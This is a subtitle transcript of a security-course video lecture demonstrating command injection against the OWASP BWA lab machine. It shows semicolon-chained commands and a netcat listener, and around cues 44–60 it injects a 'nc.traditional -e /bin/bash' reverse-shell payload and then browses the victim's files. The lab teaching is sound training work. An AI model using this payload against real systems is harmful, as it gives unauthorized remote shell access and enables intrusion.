1
00:00:00,300 --> 00:00:01,140
Hello everybody.

2
00:00:01,140 --> 00:00:02,050
Welcome back.

3
00:00:02,050 --> 00:00:07,080
And let us continue with exploiting our command execution vulnerability.

4
00:00:07,170 --> 00:00:13,530
So in the previous video we basically tried out this web server by typing in our IP address and then

5
00:00:13,560 --> 00:00:17,180
typing in another command to see if it will execute it.

6
00:00:17,190 --> 00:00:21,490
Now you divide two terminal commands with a dot and comma (a semicolon).

7
00:00:21,690 --> 00:00:24,480
I can assure you that it works in your terminal as well.

8
00:00:24,480 --> 00:00:26,100
So if you type here ifconfig

9
00:00:26,970 --> 00:00:29,330
and then a dot and comma and then whoami,

10
00:00:29,330 --> 00:00:37,070
it will basically print out the ifconfig output and also it will print the whoami output.

11
00:00:37,470 --> 00:00:39,720
So you can do a bunch of the commands like that.

12
00:00:39,720 --> 00:00:40,860
So ifconfig,

13
00:00:40,860 --> 00:00:42,170
whoami,

14
00:00:42,870 --> 00:00:48,120
and it will print out all of these commands with their output, as we can see.

15
00:00:48,570 --> 00:00:55,020
So now that we know that, we need to find the best way to use this vulnerability in order for us to gain

16
00:00:55,050 --> 00:01:04,090
access to that machine. So let us try out to see, for example, if we type 192.168.1.1

17
00:01:04,110 --> 00:01:17,160
and then, for example, uname -a. Let's see if it will execute that, and as we can see it does

18
00:01:17,160 --> 00:01:17,750
execute it.

19
00:01:17,790 --> 00:01:25,890
It gives us the version of Linux and the name, as we can see, OWASP BWA. Now that we know that,

20
00:01:26,010 --> 00:01:28,710
we can certainly do better than this,

21
00:01:28,710 --> 00:01:30,270
than just gathering information

22
00:01:30,270 --> 00:01:37,870
command by command. We can actually try to make a connection from this machine to our own machine.

23
00:01:38,010 --> 00:01:43,480
Now in order for us to do that we will use a tool called Netcat.

24
00:01:43,620 --> 00:01:52,420
Now Netcat is basically... let me just clear the screen. With Netcat

25
00:01:52,460 --> 00:02:00,680
we can actually connect to another PC with just two simple commands. For our own PC we need

26
00:02:00,680 --> 00:02:08,030
to set up the listening port, and that listening port for our example will be 12345.

27
00:02:08,060 --> 00:02:15,310
Now on the listening port we will listen for the incoming connection from any PC.

28
00:02:15,500 --> 00:02:22,490
And in this case that PC will be our vulnerable OWASP BWA machine, since we will run the command in its

29
00:02:22,550 --> 00:02:26,120
own terminal, since it is vulnerable to command execution.

30
00:02:26,120 --> 00:02:27,580
So here we want to type here

31
00:02:27,590 --> 00:02:32,260
this command: nc and then -lvp

32
00:02:32,390 --> 00:02:34,640
12345.

33
00:02:34,650 --> 00:02:38,950
Now if you want to check out, before running that, if you want to check out some of the options to just

34
00:02:38,960 --> 00:02:46,670
see what the syntax is here, you can see what -p stands for and you can see also some of the other

35
00:02:46,670 --> 00:02:53,390
options here. As you can see, -l stands for listen mode for inbound connections; we will use that.

36
00:02:53,870 --> 00:03:00,260
-v stands for verbose, use twice to be more verbose; we also use that. And -p, let me just find

37
00:03:00,260 --> 00:03:07,130
it, is port, so we specify the port to be 12345. You can specify any port as long as

38
00:03:07,130 --> 00:03:15,530
it is not in use. So in this case I will use nc -lvp for listen, verbose and port, and port

39
00:03:15,530 --> 00:03:17,480
number 12345.

40
00:03:17,660 --> 00:03:23,480
Now if you run this it will say listening on any 12345. This "any" means on any interface,

41
00:03:23,660 --> 00:03:25,100
on any networking interface.

42
00:03:25,700 --> 00:03:31,970
So once we receive the connection we will be able to execute commands on the victim machine from here,

43
00:03:32,270 --> 00:03:42,090
from here. So let us just open up our Firefox, and now what we want to do is make

44
00:03:42,090 --> 00:03:49,450
this machine connect to our Kali Linux machine. We know that, so we can simply type 192.168.1.1,

45
00:03:49,500 --> 00:03:54,600
which performs the pinging of that machine, and then we put the dot and comma in order

46
00:03:54,600 --> 00:04:05,530
to run our next command, which will be nc.traditional, and then -e,

47
00:04:05,540 --> 00:04:14,480
and then we want to go to /bin/bash, in the bin folder on the victim machine.

48
00:04:14,780 --> 00:04:20,480
And after that we want to specify the IP address of our Kali Linux machine.

49
00:04:20,840 --> 00:04:26,230
So this will basically mean to which machine it should connect.

50
00:04:26,390 --> 00:04:30,320
And we want it to connect to our Kali Linux machine.

51
00:04:30,420 --> 00:04:35,440
Now in order for me to check that, I just type ifconfig so I don't specify the wrong port.

52
00:04:35,450 --> 00:04:39,110
So we want to connect to this port from the victim machine.

53
00:04:39,170 --> 00:04:42,320
Pardon me, to this IP address from the victim machine.

54
00:04:42,320 --> 00:04:48,200
So we type here our Kali Linux IP address and then we type the port that we are listening on, which is

55
00:04:48,200 --> 00:04:49,460
12345

56
00:04:49,460 --> 00:04:55,790
in my case. If you specified any other port, just type here that port after the IP address of the Kali Linux

57
00:04:55,790 --> 00:04:56,660
machine.

58
00:04:56,690 --> 00:05:02,720
Now what this command will do is, first of all, it will ping the router, and then it will execute the

59
00:05:02,720 --> 00:05:08,840
next command, which is Netcat, and it will connect to our Kali Linux machine on this port.

60
00:05:09,940 --> 00:05:14,020
And this /bin/bash basically allows us to execute commands on that machine.

61
00:05:14,090 --> 00:05:20,720
So if we type here submit, you will notice that it basically will just be... I believe it won't give

62
00:05:20,750 --> 00:05:24,540
any output right here, or maybe it will just stay here loading.

63
00:05:24,540 --> 00:05:26,500
Let's check that out.

64
00:05:26,500 --> 00:05:32,860
Yeah, it will probably stay here loading, but if we open our terminal you can see "connect to 192.168.1.5",

65
00:05:32,860 --> 00:05:38,710
which is us, "from 192.168.1.6".

66
00:05:38,710 --> 00:05:44,230
We can see that someone has connected to our listening port, and that is basically it.

67
00:05:44,230 --> 00:05:49,120
It won't say anything; it will just give you this output and it will wait for something.

68
00:05:49,120 --> 00:05:52,150
Now what it waits for is the command. So if we type here

69
00:05:52,150 --> 00:05:55,870
whoami,

70
00:05:55,870 --> 00:06:04,210
you will see that we get the output www-data. If we type here uname -a, we can see that we are

71
00:06:04,210 --> 00:06:09,860
currently running commands on the Linux system, on our victim system.

72
00:06:09,880 --> 00:06:17,230
We made a reverse connection; we made it connect to our own Kali Linux machine, which basically means we

73
00:06:17,230 --> 00:06:18,120
exploited it.

74
00:06:18,130 --> 00:06:24,910
Since now we can type here ls in order to see files, we can change directory and type ls here again,

75
00:06:25,360 --> 00:06:28,930
and we can see all of the files on that machine.

76
00:06:28,930 --> 00:06:32,800
We can also check the IP address so you can see that it really is that machine.

77
00:06:32,790 --> 00:06:42,320
So if we type here sbin and then slash ifconfig, /sbin/ifconfig, it will say that the IP address is 192.168.

78
00:06:42,320 --> 00:06:47,190
1.6, which is the IP address of our victim machine.

79
00:06:47,450 --> 00:06:56,090
And I will show you that if I type right here ifconfig, you can see that the IP addresses do match:

80
00:06:56,140 --> 00:06:57,310
mine right here,

81
00:06:57,310 --> 00:07:07,030
and 192.168.1.6. So that's about it for this exploitation of the command

82
00:07:07,030 --> 00:07:07,840
injection.

83
00:07:07,840 --> 00:07:12,780
You can basically now navigate your way and then try to find something useful

84
00:07:12,790 --> 00:07:17,590
if this was a real machine, but since this is perhaps the most vulnerable machine, I wouldn't be actually

85
00:07:17,890 --> 00:07:25,450
trying to find something right here, since I know there really isn't anything special. And in the next

86
00:07:25,450 --> 00:07:29,440
lecture I will show you how you can actually do the same thing,

87
00:07:29,500 --> 00:07:36,040
but on the blind command injection. Now I will explain what blind command injection is in the next material,

88
00:07:36,070 --> 00:07:37,990
and I hope I see you there. Bye.